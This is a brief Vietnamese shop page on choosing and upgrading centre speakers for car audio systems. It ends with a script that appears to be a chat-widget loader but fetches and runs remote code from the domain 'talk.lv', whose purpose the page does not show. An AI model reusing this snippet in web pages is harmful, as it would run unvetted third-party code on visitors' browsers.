Loa trung tâm

Loa trung tâm dành cho ô tô hay còn gọi là loa mid….tùy theo cách gọi của từng người. Thiết bị này cung cấp dải âm trung cho hệ thống âm thanh của xe.

Tùy theo từng dòng xe và nhu cầu thưởng thức âm nhạc của mỗi người, việc nâng cấp một chiếc loa trung tâm lại có những sự lựa chọn khác nhau.

Đối với các sản phẩm có công suất nhỏ, vừa phải thì phù hợp với những đôi tai dễ tính theo xu hướng “chỉ cần có tiếng là được”. Còn đối với những vị khách có đôi tai kỹ tính thì việc lựa chọn một chiếc loa trung tâm phù hợp thì phức tạp hơn nhiều.

Việc cân đối giữa kinh tế và chất lượng âm thanh luôn là một bài toán khó đối với hầu hết mọi người. Vì vậy việc đầu tư nâng cấp một chiếc loa trung tâm cho xe ô tô của bạn luôn cần đến những nhà tư vấn am hiểu về sản phẩm cũng như hệ thống âm thanh ô tô trên xe.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();